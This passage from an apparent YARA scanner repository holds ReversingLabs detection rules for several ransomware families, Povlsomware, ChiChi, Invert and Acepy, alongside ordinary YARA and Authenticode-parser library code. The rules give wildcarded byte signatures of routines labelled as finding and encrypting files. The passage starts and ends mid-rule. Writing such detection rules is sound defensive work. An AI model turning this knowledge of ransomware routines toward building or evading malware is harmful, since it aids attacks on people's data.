?? ?? 28 ?? ?? ?? ?? 0B 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 35 | 0C 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0D 07 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 06 72 ?? 36 | ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 08 72 ?? ?? ?? ?? 28 ?? 37 | ?? ?? ?? 72 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 13 ?? 09 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? 38 | ?? ?? ?? 16 28 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 17 39 | 28 ?? ?? ?? ?? 13 ?? 73 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 40 | 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 41 | FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? 42 | ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? 43 | ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 44 | ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 00 11 ?? 11 ?? 11 ?? 9A 11 ?? 45 | 6F ?? ?? ?? ?? 00 00 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 FE 04 13 ?? 11 ?? 38 ?? ?? ?? 46 | ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 47 | 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? ?? ?? 3A ?? ?? ?? ?? 16 13 ?? 38 ?? ?? ?? ?? 38 ?? ?? 48 | ?? ?? 3A ?? ?? ?? ?? 2A 49 | } 50 | 51 | condition: 52 | uint16(0) == 0x5A4D and 53 | ( 54 | $find_files 55 | ) and 56 | ( 57 | $encrypt_files 58 | ) 59 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Povlsomware.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Povlsomware : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "POVLSOMWARE" 12 | description = "Yara rule that detects Povlsomware ransomware." 
13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Povlsomware" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $setup_attack = { 21 | 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? 22 | ?? ?? 73 ?? ?? ?? ?? 0A 06 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 07 2C ?? 23 | 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8E 69 80 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 24 | 0C 16 0D 2B ?? 08 09 9A 13 ?? 00 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 00 00 09 17 58 0D 25 | 09 08 8E 69 32 ?? 00 38 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 26 | ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 1A 6F ?? ?? ?? 27 | ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 | 13 ?? 2B ?? 12 ?? 28 ?? ?? ?? ?? 13 ?? 00 00 11 ?? 28 ?? ?? ?? ?? 00 00 DE ?? 26 00 00 29 | DE ?? 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 30 | 28 ?? ?? ?? ?? 00 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? 00 2A 31 | } 32 | 33 | $find_files = { 34 | 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? 35 | ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 00 06 6F ?? ?? ?? ?? 0C 2B ?? 36 | 08 6F ?? ?? ?? ?? 0D 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 00 00 08 6F ?? ?? ?? ?? 2D ?? 37 | DE ?? 08 2C ?? 08 6F ?? ?? ?? ?? 00 DC 02 28 ?? ?? ?? ?? 0B 00 07 13 ?? 16 13 ?? 38 ?? 38 | ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? 39 | ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? 40 | ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? 41 | ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 2D ?? 11 ?? 72 ?? ?? ?? ?? 42 | 6F ?? ?? ?? ?? 16 FE 01 2B ?? 16 13 ?? 11 ?? 2C ?? 00 11 ?? 03 28 ?? ?? ?? ?? 00 00 00 43 | DE ?? 26 00 00 DE ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 
2A 44 | } 45 | 46 | $encrypt_files = { 47 | 00 02 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 06 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 48 | 6F ?? ?? ?? ?? 0B 07 2C ?? 2B ?? 02 28 ?? ?? ?? ?? 00 02 02 72 ?? ?? ?? ?? 28 ?? ?? ?? 49 | ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 17 58 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 02 6F ?? ?? ?? 50 | ?? 00 7E ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 2A 51 | } 52 | 53 | condition: 54 | uint16(0) == 0x5A4D and 55 | ( 56 | $setup_attack 57 | ) and 58 | ( 59 | $find_files 60 | ) and 61 | ( 62 | $encrypt_files 63 | ) 64 | } -------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.ChiChi.yara: -------------------------------------------------------------------------------- 1 | rule Win32_Ransomware_ChiChi : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "CHICHI" 12 | description = "Yara rule that detects ChiChi ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "ChiChi" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $generate_key = { 21 | 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? 53 56 57 A1 ?? ?? ?? ?? 22 | 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B D9 8B 7D ?? C7 45 ?? ?? ?? ?? ?? 89 7D ?? 85 23 | FF 75 ?? 33 F6 EB ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B F0 89 75 ?? 6A ?? 8D 4D ?? C7 45 24 | ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 57 56 8D 25 | 4D ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? C6 45 ?? ?? C7 45 ?? ?? ?? ?? ?? 85 C0 74 26 | ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 8B 03 8B CB 57 56 FF 50 ?? C7 45 ?? ?? ?? ?? ?? 85 F6 27 | 74 ?? 83 FF ?? 8D 45 ?? 8D 4D ?? 8B FE 0F 46 C8 32 C0 56 8B 09 F3 AA E8 ?? ?? ?? ?? 28 | 83 C4 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B E5 5D C2 29 | } 30 | 31 | $encrypt_files = { 32 | 55 8B EC 51 53 56 57 8B D9 68 ?? 
?? ?? ?? 53 89 5D ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? 33 | ?? ?? 53 FF D6 68 ?? ?? ?? ?? 8B F8 FF D6 8B 1D ?? ?? ?? ?? 03 F8 03 FF 83 C7 ?? 57 34 | 6A ?? FF 35 ?? ?? ?? ?? FF D3 8B F0 85 F6 74 ?? 8B 7D ?? 57 56 FF 15 ?? ?? ?? ?? 68 35 | ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 6A ?? 56 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 5F 5E 5B 36 | 8B E5 5D C3 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? 37 | ?? 56 6A ?? FF 35 ?? ?? ?? ?? 8B F8 FF 15 ?? ?? ?? ?? 83 FF ?? 74 ?? 8B CF E8 ?? ?? 38 | ?? ?? 5F 5E 5B 8B E5 5D C3 5F 5E B8 ?? ?? ?? ?? 5B 8B E5 5D C3 39 | } 40 | 41 | $find_files = { 42 | 6A ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 56 FF 15 ?? 43 | ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 74 24 ?? 53 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 44 | D7 8D 44 24 ?? 50 53 FF 15 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 89 44 24 ?? 83 F8 ?? 0F 84 45 | ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 33 F6 FF B6 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? 46 | ?? 85 C0 0F 84 ?? ?? ?? ?? 83 C6 ?? 81 FE ?? ?? ?? ?? 72 ?? FF 74 24 ?? 8B 74 24 ?? 47 | 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 8D 44 24 ?? 50 56 FF 15 ?? 48 | ?? ?? ?? F6 44 24 ?? ?? 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? 49 | ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 44 24 ?? 50 FF 15 ?? ?? ?? ?? 83 E8 ?? 78 ?? 66 83 50 | 7C 44 ?? ?? 74 ?? 83 E8 ?? 79 ?? EB ?? 8D 74 24 ?? 8D 34 46 68 ?? ?? ?? ?? 56 FF 15 51 | ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 52 | ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 
85 C0 0F 84 53 | } 54 | 55 | condition: 56 | uint16(0) == 0x5A4D and 57 | ( 58 | $find_files 59 | ) and 60 | ( 61 | $generate_key 62 | ) and 63 | ( 64 | $encrypt_files 65 | ) 66 | } -------------------------------------------------------------------------------- /src/exp/ransomware/ByteCode.MSIL.Ransomware.Invert.yara: -------------------------------------------------------------------------------- 1 | rule ByteCode_MSIL_Ransomware_Invert : tc_detection malicious 2 | { 3 | meta: 4 | 5 | author = "ReversingLabs" 6 | 7 | source = "ReversingLabs" 8 | status = "RELEASED" 9 | sharing = "TLP:WHITE" 10 | category = "MALWARE" 11 | malware = "INVERT" 12 | description = "Yara rule that detects Invert ransomware." 13 | 14 | tc_detection_type = "Ransomware" 15 | tc_detection_name = "Invert" 16 | tc_detection_factor = 5 17 | 18 | strings: 19 | 20 | $encrypt_files = { 21 | 73 ?? ?? ?? ?? 0A 06 04 7D ?? ?? ?? ?? 00 00 02 28 ?? ?? ?? ?? 06 7B ?? ?? ?? ?? 25 2D 22 | ?? 26 06 06 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 0C 7D ?? ?? ?? ?? 08 7E ?? ?? ?? ?? 25 23 | 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? 24 | ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? 25 | ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 26 | ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? 27 | FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 25 2D 28 | ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 29 | 7E ?? ?? ?? ?? 25 2D ?? 26 7E ?? ?? ?? ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 80 ?? ?? 30 | ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 07 6F ?? ?? ?? ?? 0D 00 00 09 03 28 ?? ?? 31 | ?? ?? 13 ?? 11 ?? 2C ?? 00 7E ?? ?? ?? ?? 09 6F ?? ?? ?? ?? 26 00 00 DE ?? 26 00 00 DE 32 | ?? 00 07 6F ?? ?? ?? ?? 2D ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 
00 DC 2A 33 | } 34 | 35 | $find_files = { 36 | 00 73 ?? ?? ?? ?? 0A 00 28 ?? ?? ?? ?? 18 8D ?? ?? ?? ?? 25 16 28 ?? ?? ?? ?? A2 25 17 37 | 72 ?? ?? ?? ?? A2 17 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 2B ?? 12 ?? 28 ?? 38 | ?? ?? ?? 0C 00 06 08 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE 39 | ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DC 06 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 06 40 | 0D 2B ?? 09 2A 41 | } 42 | 43 | $get_file_list = { 44 | 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0A 06 2C 45 | ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 00 38 ?? ?? 46 | ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 47 | 00 00 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 2B ?? 12 ?? 28 ?? ?? ?? ?? 0D 00 07 09 6F ?? ?? 48 | ?? ?? 00 00 12 ?? 28 ?? ?? ?? ?? 2D ?? DE ?? 12 ?? FE 16 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 49 | DC 00 DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? 00 DC 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? 50 | ?? 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 51 | ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F 52 | ?? ?? ?? ?? 00 00 2A 53 | } 54 | 55 | condition: 56 | uint16(0) == 0x5A4D and 57 | ( 58 | $get_file_list 59 | ) and 60 | ( 61 | $find_files 62 | ) and 63 | ( 64 | $encrypt_files 65 | ) 66 | } -------------------------------------------------------------------------------- /src/lib/include/yara/unaligned.h: -------------------------------------------------------------------------------- 1 | /* 2 | Copyright (c) 2016. The YARA Authors. All Rights Reserved. 3 | 4 | Redistribution and use in source and binary forms, with or without modification, 5 | are permitted provided that the following conditions are met: 6 | 7 | 1. Redistributions of source code must retain the above copyright notice, this 8 | list of conditions and the following disclaimer. 9 | 10 | 2. 
Redistributions in binary form must reproduce the above copyright notice, 11 | this list of conditions and the following disclaimer in the documentation and/or 12 | other materials provided with the distribution. 13 | 14 | 3. Neither the name of the copyright holder nor the names of its contributors 15 | may be used to endorse or promote products derived from this software without 16 | specific prior written permission. 17 | 18 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND 19 | ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED 20 | WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 21 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR 22 | ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES 23 | (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; 24 | LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON 25 | ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT 26 | (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS 27 | SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
28 | */
29 |
30 | #ifndef YR_UNALIGNED_H
31 | #define YR_UNALIGNED_H
32 |
// NOTE(review): the header name after this #include was lost in extraction and
// is not reconstructed here; the fixed-width types below need <stdint.h> or an
// equivalent project header.
33 | #include
34 |
// Pack to a single byte so the wrapper structs impose no alignment requirement:
// a pointer to arbitrary bytes may be cast to one of them and `val` read whole.
// One single-member wrapper per integer width, plus one for a char pointer.
35 | #pragma pack(push)
36 | #pragma pack(1)
37 |
38 | typedef struct
39 | {
40 | uint16_t val;
41 | } uint16_una_t;
42 |
43 | typedef struct
44 | {
45 | uint32_t val;
46 | } uint32_una_t;
47 |
48 | typedef struct
49 | {
50 | uint64_t val;
51 | } uint64_una_t;
52 |
53 | typedef struct
54 | {
55 | int16_t val;
56 | } int16_una_t;
57 |
58 | typedef struct
59 | {
60 | int32_t val;
61 | } int32_una_t;
62 |
63 | typedef struct
64 | {
65 | int64_t val;
66 | } int64_una_t;
67 |
68 | typedef struct
69 | {
70 | char *val;
71 | } charp_una_t;
72 |
73 | #pragma pack(pop)
74 |
// Accessors: each reads one value of the named width from `ptr`, which need
// not be aligned, by viewing the bytes as the matching packed struct. None of
// them checks that `ptr` has that many readable bytes; the caller must.
//
// NOTE(review): the cast-and-dereference relies on the compiler turning a
// packed-struct member access into an unaligned (byte-wise) load. The major
// compilers honour this for packed structs; a memcpy into a local is the
// strictly portable equivalent.
75 | static inline uint16_t yr_unaligned_u16(const void *ptr)
76 | {
77 | const uint16_una_t *tmp = (const uint16_una_t *) ptr;
78 | return tmp->val;
79 | }
80 |
81 | static inline uint32_t yr_unaligned_u32(const void *ptr)
82 | {
83 | const uint32_una_t *tmp = (const uint32_una_t *) ptr;
84 | return tmp->val;
85 | }
86 |
87 | static inline uint64_t yr_unaligned_u64(const void *ptr)
88 | {
89 | const uint64_una_t *tmp = (const uint64_una_t *) ptr;
90 | return tmp->val;
91 | }
92 |
// The signed variants read an int16_t/int32_t/int64_t but return the UNSIGNED
// type of the same width (the field is converted on return). The bit pattern
// is preserved, but a caller that widens the result to a larger type gets
// zero-extension rather than sign-extension; cast back to the signed type of
// the same width first if the sign matters.
93 | static inline uint16_t yr_unaligned_i16(const void *ptr)
94 | {
95 | const int16_una_t *tmp = (const int16_una_t *) ptr;
96 | return tmp->val;
97 | }
98 |
99 | static inline uint32_t yr_unaligned_i32(const void *ptr)
100 | {
101 | const int32_una_t *tmp = (const int32_una_t *) ptr;
102 | return tmp->val;
103 | }
104 |
105 | static inline uint64_t yr_unaligned_i64(const void *ptr)
106 | {
107 | const int64_una_t *tmp = (const int64_una_t *) ptr;
108 | return tmp->val;
109 | }
110 |
// Reads a `char *` stored at an unaligned address; the pointer value is
// returned as-is and nothing is dereferenced here.
111 | static inline char *yr_unaligned_char_ptr(const void *ptr)
112 | {
113 | const charp_una_t *tmp = (const charp_una_t *) ptr;
114 | return tmp->val;
115 | }
116 |
117 | #endif
118 |
-------------------------------------------------------------------------------- /src/lib/modules/pe/authenticode-parser/structs.c:
-------------------------------------------------------------------------------- 1 | /* Copyright (c) 2021 Avast Software 2 | 3 | Permission is hereby granted, free of charge, to any person obtaining a copy of 4 | this software and associated documentation files (the "Software"), to deal 5 | in the Software without restriction, including without limitation the rights to 6 | use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies 7 | of the Software, and to permit persons to whom the Software is furnished to do 8 | so, subject to the following conditions: 9 | 10 | The above copyright notice and this permission notice shall be included in all 11 | copies or substantial portions of the Software. 12 | 13 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 14 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 15 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 16 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 17 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 18 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 19 | SOFTWARE. 
20 | */
21 |
// OpenSSL ASN.1 templates (ASN1_SEQUENCE / ASN1_CHOICE and friends from
// <openssl/asn1t.h>) describing the Authenticode-specific SPC structures; the
// C types they populate are presumably declared in structs.h. In these
// templates ASN1_SIMPLE is a required field, ASN1_OPT an optional one, and
// ASN1_IMP_OPT / ASN1_EXP_OPT are optional fields carrying an IMPLICIT /
// EXPLICIT context tag with the given number.
22 | #include "structs.h"
23 |
// SpcString: CHOICE of a BMP (UCS-2) string [0] or an IA5 (ASCII) string [1].
24 | ASN1_CHOICE(SpcString) = {
25 | ASN1_IMP_OPT(SpcString, value.unicode, ASN1_BMPSTRING, 0),
26 | ASN1_IMP_OPT(SpcString, value.ascii, ASN1_IA5STRING, 1)
27 | } ASN1_CHOICE_END(SpcString)
28 |
// Opaque class id plus serialized payload; used by SpcLink's moniker form.
29 | ASN1_SEQUENCE(SpcSerializedObject) = {
30 | ASN1_SIMPLE(SpcSerializedObject, classId, ASN1_OCTET_STRING),
31 | ASN1_SIMPLE(SpcSerializedObject, serializedData, ASN1_OCTET_STRING)
32 | } ASN1_SEQUENCE_END(SpcSerializedObject)
33 |
// SpcLink: CHOICE of url [0], moniker [1] or file [2]. Only the last is
// EXPLICIT-tagged, because SpcString is itself a CHOICE and a CHOICE cannot be
// tagged implicitly.
34 | ASN1_CHOICE(SpcLink) = {
35 | ASN1_IMP_OPT(SpcLink, value.url, ASN1_IA5STRING, 0),
36 | ASN1_IMP_OPT(SpcLink, value.moniker, SpcSerializedObject, 1),
37 | ASN1_EXP_OPT(SpcLink, value.file, SpcString, 2)
38 | } ASN1_CHOICE_END(SpcLink)
39 |
// OID plus an optional value of any type. `value` is left as ASN1_ANY, so the
// consumer must dispatch on `type` and validate the inner encoding itself.
40 | ASN1_SEQUENCE(SpcAttributeTypeAndOptionalValue) = {
41 | ASN1_SIMPLE(SpcAttributeTypeAndOptionalValue, type, ASN1_OBJECT),
42 | ASN1_OPT(SpcAttributeTypeAndOptionalValue, value, ASN1_ANY)
43 | } ASN1_SEQUENCE_END(SpcAttributeTypeAndOptionalValue)
44 |
// Flags bit string plus an optional EXPLICIT [0] link to the image.
45 | ASN1_SEQUENCE(SpcPeImageData) = {
46 | ASN1_SIMPLE(SpcPeImageData, flags, ASN1_BIT_STRING),
47 | ASN1_EXP_OPT(SpcPeImageData, file, SpcLink, 0)
48 | } ASN1_SEQUENCE_END(SpcPeImageData)
49 |
// Standard AlgorithmIdentifier: algorithm OID plus optional parameters.
50 | ASN1_SEQUENCE(AlgorithmIdentifier) = {
51 | ASN1_SIMPLE(AlgorithmIdentifier, algorithm, ASN1_OBJECT),
52 | ASN1_OPT(AlgorithmIdentifier, parameters, ASN1_ANY)
53 | } ASN1_SEQUENCE_END(AlgorithmIdentifier)
54 |
// Digest algorithm plus the digest octets. Nothing here bounds `digest` or
// ties its length to `digestAlgorithm`; a consumer must derive the expected
// length from the algorithm and compare against it rather than assume one.
55 | ASN1_SEQUENCE(DigestInfo) = {
56 | ASN1_SIMPLE(DigestInfo, digestAlgorithm, AlgorithmIdentifier),
57 | ASN1_SIMPLE(DigestInfo, digest, ASN1_OCTET_STRING)
58 | } ASN1_SEQUENCE_END(DigestInfo)
59 |
// The content an Authenticode signature covers: the image attribute and the
// DigestInfo carrying the file hash.
60 | ASN1_SEQUENCE(SpcIndirectDataContent) = {
61 | ASN1_SIMPLE(SpcIndirectDataContent, data, SpcAttributeTypeAndOptionalValue),
62 | ASN1_SIMPLE(SpcIndirectDataContent, messageDigest, DigestInfo)
63 | } ASN1_SEQUENCE_END(SpcIndirectDataContent)
64 |
// Optional program name [0] and "more info" link [1], both EXPLICIT-tagged.
65 | ASN1_SEQUENCE(SpcSpOpusInfo) = {
66 | ASN1_EXP_OPT(SpcSpOpusInfo, programName, SpcString, 0),
67 | ASN1_EXP_OPT(SpcSpOpusInfo, moreInfo, SpcLink, 1)
68 | } ASN1_SEQUENCE_END(SpcSpOpusInfo)
69 |
// Generates <Type>_new/<Type>_free and the d2i_/i2d_ DER codec for each
// template above. The d2i_ decoders are presumably the entry points run over
// signature bytes taken from the scanned PE, i.e. untrusted input, so these
// templates are the single definition of what the parser accepts.
70 | IMPLEMENT_ASN1_FUNCTIONS(SpcString)
71 | IMPLEMENT_ASN1_FUNCTIONS(SpcSerializedObject)
72 | IMPLEMENT_ASN1_FUNCTIONS(SpcLink)
73 | IMPLEMENT_ASN1_FUNCTIONS(SpcAttributeTypeAndOptionalValue)
74 | IMPLEMENT_ASN1_FUNCTIONS(SpcPeImageData)
75 | IMPLEMENT_ASN1_FUNCTIONS(AlgorithmIdentifier)
76 | IMPLEMENT_ASN1_FUNCTIONS(DigestInfo)
77 | IMPLEMENT_ASN1_FUNCTIONS(SpcIndirectDataContent)
78 | IMPLEMENT_ASN1_FUNCTIONS(SpcSpOpusInfo)
79 |
-------------------------------------------------------------------------------- /src/exp/ransomware/Win32.Ransomware.Acepy.yara:
--------------------------------------------------------------------------------
1 | rule Win32_Ransomware_Acepy : tc_detection malicious
2 | {
3 | meta:
4 |
5 | author = "ReversingLabs"
6 |
7 | source = "ReversingLabs"
8 | status = "RELEASED"
9 | sharing = "TLP:WHITE"
10 | category = "MALWARE"
11 | malware = "ACEPY"
12 | description = "Yara rule that detects Acepy ransomware."
13 |
14 | tc_detection_type = "Ransomware"
15 | tc_detection_name = "Acepy"
16 | tc_detection_factor = 5
17 |
18 | strings:
19 |
20 | $find_files = {
21 | E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 83 E0 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? B8 ?? ?? ?? ??
22 | 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? B9 ?? ?? ?? ?? 51 50 E8 ?? ?? ?? ??
23 | 83 C4 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ?? ??
